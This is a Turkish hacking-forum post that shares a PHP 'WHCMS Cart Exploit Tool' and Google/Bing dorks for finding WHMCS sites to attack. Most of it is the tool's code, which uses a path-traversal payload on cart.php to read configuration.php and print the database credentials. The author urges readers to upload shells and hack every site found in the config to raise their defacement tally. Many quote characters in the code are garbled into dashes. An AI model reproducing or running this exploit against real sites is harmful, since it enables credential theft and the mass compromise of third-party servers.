Zone Kasmak İstiyenler İçin Güzel Bir Exploit (1 Viewer)

Joined
Jan 9, 2016
Credits
0
Rating - 0%
Yeni Arkadaşlar Çok Zone Kasmak İstiyorlar Aslına Çok Yöntemi Var Ama Bu Basit Etkili Yöntem Diye Bunu Paylaşıyım Dedim Çünkü Adamlar Exploit İçin Tools Yazmışlar Php Dilinde Dorku Yazıyosun Google Bing Vs. Siteleri Ayıklıyosun Sonra Vericem Toolsa http:// Şekilde Yazıp Databse Bilgilerini Direk Çıkartıyosun Bitane Site Buldunuz Exploiti Denediniz Çalıştı Databse Shell Falan Atıp Configdeki Bütün Siteleri Hackliyerek Zonenizi Kasabilirsiniz Arkadaşlar Resimi Yok Ben Alırımda Resmi Bu Exploiti Toolsa Döken Adam Videosunu Çekmiş Onu Vericem Toolsu Vericem Dorku Vericem Arkadaşlar Localhosta İstediğniz Adlandırma.php Diye Atıp Çalıştırabilirsiniz Dorku. Localhostan Kastım Appserveri İndirdiğmiz Localhost Bazı Arkadaşlar Başka Programın Localhostuna Atıyo Hatalar Çıkabiliyor. Herkeze Kolay Gelsin.

İlk Olarak Exploitin Adı Ve Toolsu ;


Exploitin Adı ; exploit whmcs config

Siteleri Bulmak İçin Exploitin Dorku ;

powered by whmcompletesolution cart.php

Yada ;

whmcompletesolution cart.php

Toolsu ;
<?php
/**
* WHCMS Cart Exploit Tool
* #projectx
* http://www.exploit-db.com/exploits/17999/
* Develop By : Group x3 | Dr.KroOoZ |
**/

# default payload
$payload = "cart.php?a=projectx&templatefile=../../../configuration.php%00";

# site checker


$check = --;

if(!empty($_GET['site']) && !empty($_GET['payload'])){

# yum yum!
$yum = array();

$payload = base64_decode($_GET['payload']);

$site = trim($_GET['site'],-/-);
$http = stristr($site,'http://-);
if($http){
$site = $http;
} else {
$site = "http://$site";
}

$exploit = -$site/$payload";

if ($stream = @fopen($exploit, 'r')) {
echo -<strong>- . $exploit . -</strong><br>-;

$data = trim(stristr(stristr(stream_get_contents($stream), -<?php'), -?>-, true), -<?php');
$data = explode(-;-,trim($data));
$data = array_filter($data);

foreach($data as $datum){
$datum = explode(-=-,$datum);
$yum[trim($datum[0])] = $datum[1];
}

echo -<pre>-;
print_r($yum);
echo -</pre>-;

# bug? causes apache to crash :O
// $pattern = -/<?php+(.|s)+?>/-;
// preg_match($pattern, $data, $matches);
// var_dump($matches);

fclose($stream);
} else {
$check = -<a target='_new' href=-$site/cart.php?a=projectx&templatefile=../../../configuration.php%00'>Press Here to Check Don't Forget See From Source</a>-;
}

}
?>
<html>
<head>
<title>WHCMS Exploit Tool</title>
<link rel="shortcut icon" type="image/jpg" href="http://www.theprojectxblog.net/wp-c...163007_202385503163023_447971_677009595_a.jpg">
*********
body, input { background: black; color: white; font-family: calibri; font-size: 1.1em; }
input[type=text] { width: 600px; } input { border: solid 1px white; }
span { display: inline-block; width: 60px; margin-right: 10px; }
a { text-decoration: none; color: red; } img { float: left; margin-right: 10px; }
</style>
**********
var Base64 = {

// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-,

// public method for encoding
encode : function (input) {
var output = --;
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;

input = Base64._utf8_encode(input);

while (i < input.length) {

chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);

enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;

if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}

output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

}

return output;
},

// public method for decoding
decode : function (input) {
var output = --;
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;

input = input.replace(/[^A-Za-z0-9+/=]/g, --);

while (i < input.length) {

enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));

chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

output = output + String.fromCharCode(chr1);

if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}

}

output = Base64._utf8_decode(output);

return output;

},

// private method for UTF-8 encoding
_utf8_encode : function (string) {
string = string.replace(/rn/g,"n");
var utftext = --;

for (var n = 0; n < string.length; n++) {

var c = string.charCodeAt(n);

if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}

}

return utftext;
},

// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
var string = --;
var i = 0;
var c = c1 = c2 = 0;

while ( i < utftext.length ) {

c = utftext.charCodeAt(i);

if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}

}

return string;
}

}
</script>
</head>
<body>

<p align="left">

<img src="http://www.theprojectxblog.net/wp-c...163007_202385503163023_447971_677009595_a.jpg" /> </p><form method='get' onSubmit="javascript:payload.value = Base64.encode(payload.value);->
<p align="left">
<span>target:</span> <input type='text' name='site' value='put url without http://-/> <?php echo $check; ?><br/>
<span>payload:</span> <input type='text' name='payload' value=-<?php echo $payload; ?>-/> <input type='submit' value='Exploit' /> </p></form><!-- brgzkreclwwp --><p align="center">Search For Site : <a href="http://www.bing.com/search?q=powered+by+whmcompletesolution+cart.php&go=&form=QBRE&filt=all">Press Here</a></p><p align="center">Develop By : Group x3 | Dr.KroOoZ</p><p align="center"><font size="3">Gerttz: ~ Group Hp-Hack</font></p></body></html>
 

Users who are viewing this thread

Top